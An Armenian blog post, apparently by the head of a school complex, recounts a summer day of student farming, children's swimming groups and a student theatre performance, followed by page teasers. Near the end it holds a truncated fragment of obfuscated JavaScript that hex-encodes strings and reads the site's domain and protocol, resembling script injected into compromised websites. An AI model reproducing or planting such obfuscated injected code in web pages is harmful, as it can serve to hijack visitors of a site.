Առավոտ շուտ Անահիտ Մելքոնյանի աշխատանքային ջոկատը Կասկադի առվույտի արտը ջրել-հանձնել էր տիկին Էլյային և արդեն կրթահամալիրի Դպրոց-պարտեզում էր… Այնքա՜ն գործ կա անելու. երկրագործությունը, որ տևական ժամանակ շրջանցել է Հայաստանը, հիմա որպես ուսումնական ծրագիր, մի տեսակ անպատրաստ, բայց հիմնավոր մտավ կրթահամալիրյան Բանգլադեշ: Այս անունով աշխարհագրական տարածքը նկարագրված է, քարտեզագրված՝ սխեմատիկորեն «Ամառ 2016» տեղեկատվական թերթիկում ու շրջում է տանից տուն, մարդուց մարդ… Զառա Առաքելյանն է Դպրոց-պարտեզի ղեկավարի նոր դերով մեզ հետ, հայտնվեց նաև Սոնա Փափազյանը՝ իր ընկերներով… Խորենը Հազարումյանն ու, որտեղից որտեղ, Լուսինե Աբրահամյանը, նույնպես ընկերներով, չորս քոթոթ-խարհրդանիշներն էլ մեր՝ վազքով Լուսինեի ետևից, երկրագործության տարածք… Տեսարա՜ն… Ու կենդանացավ շուրջը զվարթ աշխատանքով. սա է իմը՝ զվարթ աշխատանքը, ոգու խնդությունը, ստեղծական-ուսումնականի խրախճանքը…

Ժամեր հետո այսպիսի վիճակ ու ապրում ես կունենամ Գեղարվեստում Քրիստինե Շահբազյանի վեցից տասը տարեկանների ջոկատում… Խոստանում ու անում եմ. ջուրը՝ պաղ, ծովը՝ մեծ-զուլալ. առանց տնօրենի աջակցության այս կամուկացը չի՞ հաղթահարվի… Ես ներկա-բացակա եմ անում. ջոկատի սանը բարձրանում է սանդուղքին, ասում անուն-ազգանունն ու նետվում… Անունը… ու չլը՜մփ: Շշմելո՜ւ տեսարան է. տասնչորս տղա-աղջկա անունն է ականջիս, նրանց զիլ ձայներն ու Քրիստինեի լողը… Սա եմ ես անվանում «Ջա՜ն, ամառ»

2-4 տարեկանների լողափային պարտեզ Քոլեջում:

Էլի մի ժամ, ու «Սեբաստացի մոլ» անունը ստացած ուսումնական վերնիսաժ-կենտրոնում մի բանգլադեշյան թամաշա է՝ իր աշխույժով, մեծաքանակ, կենդանի հանդիսատեսով, Սոֆյա Այվազյանի ու Քոլեջի ուսանողների ինքնավստահ դերասանական խաղով… Խաղում ենք Լեռ Կամսար… Շնորհակալ եմ, ու կեցցե՛ք…

Ախր, ես մի օրում այնպիսի՜ խոսքային պոռթկումներ եմ ունենում… Մարմարյա սրահում՝ մեր մանկավարժության ճամբարի առավոտվա պարապմունք–տողանին... Դպրոց-պարտեզի՝ Չարենցի երեկ ստեղծված կամարին՝ Անահիտի, Զառայի, Սոնայի ու նրանց ընկերների ներկայությամբ, որ Աբրահամ-մեր-հարևան-ընկեր-սեբաստացին որոշեց իր այգում երկրագործներին ծիրան հյուրասիրել… Բա «մոլ»-ի թատրոնո՜ւմ, լողափին՝ Գեղարվեստի-Նոր դպրոցի, կլոր սեղանին՝ Քոլեջ-Արհեստագործականի սեմինարի… Իրիկունը ուշ՝ Անգլիական այգու խոտերին…

Հետո նայեցի՝ դիտեցի-լսեցի-կարդացի mskh.am-ը… Ո՞ւր է ուղիղ-անհապաղ-օպերատիվ եթերը… Մեր մեդիան շարունակում է խամրել, թավալգլոր ետ մնալ կյանքից, իրադարձությունների զարգացումից, բանգլադեշյան երկրագործությունից… Մեր մեդիան, իմ բլոգ-օրագիրը խամրում են… Հիմի՞ էլ գրեմ, եղբայրք, երբ ամեն ինչ պահին ասված է, որ գործողություն դառնա… Երկրագործությունը մեր նոր ծնում է իր մոլը, մոլում՝ թատրոնը, դաշտում՝ իր երգը-ծեսը-խինդը, իր հերոսներին, ընկերությունը… նոր համակեցություն է առաջանում, կրթահամալիրյան Բանգլադեշի նոր կազմակերպում, ու ոչինչ չես անի՝ գաղափարները, թարսի պես, ինչպես ծիրանը, այս անգամ հասունանում են հունիս-հուլիսին…

Լողափնյա վոլեյբոլ մարզահրապարակում: 

Դժվա՞ր է այսպես ապրելը: Ինձ էլ, երբ գրի առաջ եմ՝ աշխատանքային պայմանագրի լուծման, հին-հարազատ դարձած մարդու աշխատանքից ազատման, հաստատություն դարձած ծուլության-արհեստականության առաջ… Հեշտ է բարձունքում, գործի մեջ, աշխատող-սովորող-մարդու հետ, բանողի ու բանի հետ… Ինչպես երեկ, երբ այդպիսի մեծ խմբով, գումարած Զառա Ոսկանյանը, Դպրոց-պարտեզի մուտք-պուրակով-աղբյուրով, հարակից կածանով բարձրացանք Դպրոց-պարտեզի Չարենցի կամար ու երկրագործի արծվենի հայացքով նայեցինք-վայելեցինք մեր ստեղծածը՝ նկատելով նաև անմշակը, խոպանը, ավերակը…

Օրվա վերջին երկրագործի փոխադրամիջոց-հեծանվով ես նորից անցա կրթահամալիրյան Բանգլադեշով. Դպրոց-պարտեզի ավելի ու ավելի գրավիչ լողափում, ծովերի մոտ վրաններ էին խփած։ Քրիստինե Հովսեփյանի ջոկատը պատրաստվում է գիշերակացով ճամբարային կյանքին, ու Զառան-Սոնան ժպտում էին… Գժությո՜ւն, Նազենի աստղ Հովհաննիսյա՛ն…

Հետո ես մտա Մայր դպրոց՝ համոզվելու համար, որ մեծ մարմնամարզական դահլիճի նոր տրիբունաները տեղում են. այնքա՜ն օրհնանք ստացա տարեց ծնողներից՝ դահլիճում մարզանք անող երեխաների… Հետո բարձրացա առվույտի դաշտեր… Քոլեջի տղաները ջրում էին դրանք… Երկրագործությունն ամռանը չունի վերջ. սա Դավթի նկարչությունը չէ, որ արել-դրել է մի կողմ…
— Դավիթ,- իրիկունը հարցնում եմ մեծ ու փոքր լողավազաններում երկու անգամ լողացած, զոռո՜վ պարտեզից տուն բերած հերոսին,- լա՜վ էլ նկարում ես, ինչո՞ւ չես շարունակում…
— Չէ, պապ, ես ինչ պիտի նկարեի, նկարել վերջացրել եմ, իսկ ուրիշ բանի հավես չունեմ…

Արտ-միջավայր Բաբաջանյան փողոցում:

Ֆոտոխմբագիր՝ Արմինե Թոփչյան
# 710   

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "ashotbleyan.mskh.am"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Թողնել պատասխան

Ձեր էլ-փոստի հասցեն չի հրապարակվելու։ Պարտադիր դաշտերը նշված են *-ով

Explore More

Ասված է՝ ամենևին տրտմերես չլինես․․․

Եւ յորժամ պահիցէք, մի՛ լինիք իբրեւ զկեղծաւորսն տրտմեալք, որ ապականեն զերեսս իւրեանց, որպէս զի երեւեսցին մարդկան թէ պահիցեն: Ամէն ասեմ ձեզ՝ այն իսկ են վարձք նոցա: Այլ դու յորժամ պահիցես,

2015-ի քո ճանապարհը. գնանք այն ուղով, որը հենց մենք ենք կերտել

Առաջ ես շաբաթ-կիրակի, արձակուրդ-թաղում-հարսանիք ես չունեի, ողջը, գիտեք, աշխատանք էր, հասարակական-քաղաքական գործ էր իմ կյանքը: Հիմա այդպես չէ. տարիքն է, երևի: Կիրակին հաճույքով անցկացնում եմ տանը: Շաբաթ օրը ծեսի մեջ,

Ծափեր, ծափեր… Ամեն անձրև արև մ’ունի իրմեն վերջ…

Իմ երեկվա օրը կմնա, մնաց, ահա, իմ ականջներում որպես ծափեր… Մարմարյա սրահում երեկ ընդհանուր պարապմունքին ներկայացրի 2015-2016 ուստարում Ավագ դպրոց-վարժարանի ղեկավար Մարթա Ասատրյանին ու Գեղարվեստի ավագ դպրոցի ղեկավար Մարգարիտ Սարգսյանին…